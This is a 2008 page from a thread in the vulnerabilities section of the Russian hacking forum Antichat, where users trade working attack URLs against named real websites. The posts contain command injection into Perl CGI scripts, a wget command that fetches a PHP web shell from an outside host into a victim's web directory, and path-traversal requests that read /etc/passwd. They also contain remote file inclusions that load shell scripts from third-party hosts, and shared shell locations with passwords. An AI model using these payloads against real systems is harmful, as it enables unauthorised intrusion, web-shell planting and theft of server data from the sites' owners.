ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #751  
Старый 02.08.2008, 22:39
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию

Код:
http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
http://www.o3on.com/cgi-bin/use.pl?content=|id|
Я хз че за юзер но wget, curl и прочая дребедень... Там просто их нет. Ошибки при неправильном использовании wget не выдаются. Шелл на перл не залить. Однако файлы читаются отменно
 
Ответить с цитированием

  #752  
Старый 02.08.2008, 23:07
Redyps
Banned
Регистрация: 17.07.2008
Сообщений: 14
Провел на форуме:
81162

Репутация: 27
По умолчанию

да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|
 
Ответить с цитированием

  #753  
Старый 02.08.2008, 23:18
mister
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840

Репутация: 35
Отправить сообщение для mister с помощью ICQ
По умолчанию

http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
вот так работает
 
Ответить с цитированием

  #754  
Старый 03.08.2008, 00:24
Redyps
Banned
Регистрация: 17.07.2008
Сообщений: 14
Провел на форуме:
81162

Репутация: 27
По умолчанию

http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
шелл найдёте =)
 
Ответить с цитированием

  #755  
Старый 03.08.2008, 16:35
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

вроде бы локальный инклуд
PHP код:
http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00 
PHP код:
http://svpu-profi.lg.ua/page.php?page=[инклуд] 

Последний раз редактировалось ..::TROYAN::..; 03.08.2008 в 17:14..
 
Ответить с цитированием

  #756  
Старый 04.08.2008, 16:16
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Цитата:
да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|
_http://www.o3on.com/cgi-bin/use.pl
Шелл. Пароль r57
Ойойёй... бл*ть... юзе.пл переписал... ну и *** с ним...

Последний раз редактировалось Ch3ck; 04.08.2008 в 16:30..
 
Ответить с цитированием

  #757  
Старый 07.08.2008, 11:37
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Ищи проблему в самом шелле
http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
Иньекция рабоатет
 
Ответить с цитированием

  #758  
Старый 07.08.2008, 12:13
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

BanQui
Цитата:
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/z.txt?
 
Ответить с цитированием

  #759  
Старый 07.08.2008, 12:23
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

BanQui
шелл нормальный, это ты криворукий...
+ там safe-mode ON
Цитата:
http://www.immovent.ch/index2.php?main=http://www.stroycomplex.by/r.txt?
 
Ответить с цитированием

  #760  
Старый 08.08.2008, 01:17
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

Код:
http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd

Последний раз редактировалось .Striker; 08.08.2008 в 01:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ